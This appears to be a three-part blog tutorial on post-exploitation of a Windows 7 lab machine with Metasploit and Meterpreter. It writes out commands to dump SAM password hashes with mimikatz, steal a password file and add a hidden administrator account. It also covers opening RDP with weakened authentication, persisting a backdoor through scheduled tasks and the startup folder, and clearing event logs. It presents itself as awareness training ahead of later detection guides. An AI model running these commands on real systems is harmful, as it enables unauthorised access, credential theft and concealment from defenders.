Creating a Cyber Attack – Part 8 (Post Exploitation – Gaining Persistence 2)

In the final video of this series we continue with post exploitation using metasploit and meterpreter, using Windows commands to gain persistence.

We have created our new user and have remote desktop access. Now we ensure our backdoor is always running and even if it crashes or loses connection we have ways to restart it without having to interact with the victim machine.

We will then show you a post exploit module from metasploit which you can run against a machine you have access to which will test the victim for further vulnerabilities which you can use to dig deeper into the machine and possibly pivot around the network.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps to this point are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Windows commands used in this video are;

  • SCHTASKS /CREATE /TN BACKDOOR /SC HOURLY /ST 10:00 /F /RL HIGHEST /SD 22/12/2020 /ED 22/12/2030 /tr “C:\BACKDOOR.exe /RU testadmin-pc\backdoor /RP £@55w.rd
  • xcopy BACKDOOR.exe “C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”

The metasploit commands are;

  • background
  • use post/multi/recon/local_exploit_suggester
  • sessions
  • set session
  • run

We are going to create a new task which will run hourly which runs our malicious exe which in this demo is stored in the root of the C Drive.

In our command we provide a valid username and password (if you are following along from the previous video this would be our “secretuser” account and the password you specified. We also provide a name, a start and end time, schedule, location of the exe, and the credentials.

We can see our new task created successfully below. This means if we lose connection as long as the pc is in use this task will run every hour and provide us with a connection.

Now we want to look at the users startup programs and add our BACKDOOR.exe to this folder so every time the user logs in our exe will run and provide us a connection.

Our exe is currently stored in the users documents folder which is where our prompt is running from so we just need to specify where the file is and where we want to copy it to using the xcopy command.

Success. Now our exe will run whenever the user logs in.

To run the metasploit exploit suggester we need to exit from Windows and meterpreter and load the module, so we use exit, and then background our session.

We load the module using use post/multi/recon/local_exploit_suggester then we want to show options

We need the session number so we use the sessions command to find the session we want, then use set session to add it. (In our case 12)

Once this is configured we can run the exploit. It will take a while to complete, but if it finds anything it will list them as below. You can then investigate each one without having to be connected to the victim machine.

Finally we test our meterpreter connection being disconnected when the victim machine restarts, but then see a new connection created once the user logs back in.

We restart our listener using exploit/multi/handler

We see our new session (13) connect as expected.

Congratulations if you have followed this series through. You should now have a much better idea of what you are up against. This has been a beginners look at a Cyber Attack from start to finish, but we will look at more complicated and in depth aspects of Cyber Security in the future. Thanks for joining us on this journey.

Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence )

In this video we continue with post exploitation using metasploit and meterpreter, but this time using Windows commands to gain persistence. We start with our meterpreter shell, then use the Windows cmd prompt to run native commands to enumerate shares and users. We will also enable RDP, and create a new user adding the account to the required groups allowing remote access using reduced authentication controls.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

Don’t forget, for an attacker information is key. The more they know the better equipped they are to find a chink in the security of the defenders network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup “Administrators” secretuser /add
  • net localgroup “Remote Desktop Users” secretuser /add
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

Let’s jump in

We start from our meterpreter prompt and launch our Windows prompt using shell

Used without parameters, net share displays information about all of the resources that are shared on the local computer. We see 3 shared locations, including the “Network Share” This would be a good place to start any file searches for “passwords” “payment” etc.

Used without parameters, net user displays all of the user accounts on the local computer. We can see the six available on the victim currently, however this will soon be seven.

Let’s create a new user named “secretuser” with the password “£@55w.rd”. Now in the real world this will be named to make it blend in with other accounts, they will follow your naming standards and make sure it does not stand out.

The command completes successfully and on the victim machine we can see the new account. Now a standard user account is not much use to us at this point so we want to add it to some groups which will allow us remote access and higher permissions. In this case we add it to the “Administrators” and the “Remote Desktop Users” groups.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands. The first enables RDP, the second sets the firewall rules and the third disables Network Level Authentication.

  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

All complete successfully (however we do get one message that the netsh firewall command is depreciated so I need to update myself on the new commands), so let’s test our connection.

and test our new login account.

We manage to login successfully (at the second attempt lol), but we would not want to kick off another user as this would raise suspicions so we just close the connection for now.

In the next post we continue with the last video in this series.

Creating a Cyber Attack – Part 6 (Post Exploitation – With Msf console )

In this video we continue with post exploitation, this time using metasploit and meterpreter. We have socially engineered the victim to visit our malicious webpage which has provided us with an initial connection to our victim machine, and our meterpreter shell. Now we will show a few simple commands you can use to escalate your permission level, clear logs and gather info post exploit.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  1. getuid – shows who we are currently running as on the victim server.
  2. sysinfo – gets the details about the victim computer such as OS and name.
  3. screenshot – grabs a screenshot of the meterpreter desktop.
  4. download – downloads a selected file.
  5. upload – uploads a selected file.
  6. getsystem – uses 15 built-in methods to gain sysadmin privileges.
  7. load kiwi – mimikatz (if you don’t know what this is go have a look online) has been ported into Metasploit and when you load the extension you can use it straight from the meterpreter session.
  8. lsa_dump_sam – dumps the sam database file on screen. (uses Kiwi).
  9. ps – lists running processes on the victim machine.
  10. shell – opens a command shell on the victim machine.
  11. clearev – clears the event logs on the victim’s computer

We are on our victim machine using our Meterpreter shell, and first off we want some basic information from the machine such as the user account and OS.

Using the getuid command we can see we are running as administrator on testadmin-pc

Using the sysinfo command shows us a bit more about the host; for example that it is a 32-bit version of Windows 7 running service pack 1.

Next we take a screenshot of the desktop just out of curiosity. You never know what you might grab by chance.

Next we use the download command to steal a file named “Passwords.txt”. (Obviously in real life you will need to list and browse the victim file system looking for files of interest, but we have skipped that part in this video as it would be boring just watching me browse through directories lol!)

Note the double back slashes.

Here we can see the file saved to our root directory after being downloaded from the victims machine.

We can also upload files if we wish. If want to install a more persistent backdoor (even something like teamviewer) we can get our installer onto the target.

BACKDOOR.exe is the file we want to upload. Again note the double back slashes below.

Above we can see the file on the victims machine. (You would obviously upload to somewhere less conspicuous)

Currently we are running as administrator which is really great, but if we want to access all other user credentials on the victim machine we need to be running as system. Let’s try and elevate our privileges using the getsystem command.

Success!

Now let’s load kiwi and try and dump the SAM file. First we load kiwi

Then run lsa_dump_sam

Success! It returns 6 account names and their password hashes. (If you don’t know what to do with password hashes check out our guide on how to crack them). https://blog.2code-monte.co.uk/2020/08/02/cracking-password-hashes-hacking-rdp-servers-part-3/

If we want to look at running processes we simply use ps

Below we have highlighted our malicious process running on the victim which is our meterpreter shell.

If we want to open a Windows cmd prompt and interact with the victim machine using Windows commands we use shell.

Here we just open the windows calculator to demo, but there is much more you can do which we will cover in future guides.

All of this activity leaves a trace and we don’t want anyone knowing what we have been up to so before we go we want to delete the logs from the system. For this we have the clearev command.

We open up event viewer on the victim so you can see the logs full initially, then empty after the command has completed.

Now clearing the log is evidence in itself that something has happened on the machine, but they will not have specific events which can point them in the right direction, and some will never check event logs anyway so won’t even notice.

Hope you got something out of this, and it has helped you be more aware of what can happen on a system. There will be one more post exploitation video, and then we will start to look at how you detect, and spot this activity on your endpoints.